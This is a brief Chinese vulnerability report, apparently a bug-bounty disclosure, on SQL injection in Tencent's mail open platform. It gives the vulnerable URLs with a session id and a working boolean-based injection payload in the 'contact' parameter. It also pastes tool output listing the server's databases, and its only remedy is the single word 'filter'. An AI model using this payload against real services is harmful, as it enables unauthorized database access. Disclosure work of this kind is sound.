腾讯邮箱开放平台多处SQL注入漏洞
腾讯邮箱开放平台多处SQL注入漏洞
他域互通删除IP处http://open.mail.qq.com/cgi-bin/communication?sid=DIBFyfQ1kYxvlhhN&t=open_communication&action=delip&ip=1.1.1.1&ef=js&resp_charset=UTF8ip处企业登记资料,修改处http://open.mail.qq.com/cgi-bin/communication?s=communication&sid=DIBFyfQ1kYxvlhhN&t=open_communication&POSTaction=changecompany&contact=%C6%F3%D2%B5%C3%FB%B3%C6%3B'%2b(if((1=1),1,(select 1 union select 2)))%2b'a&phone1=233&phone2=3333333&phone3=33contact参数其它就不找了,所到之处基本都是呀。
available databases [5]:
[*] domain_interflow
[*] feedbackloop
[*] information_schema
[*] mysql
[*] test
解决方案:
过滤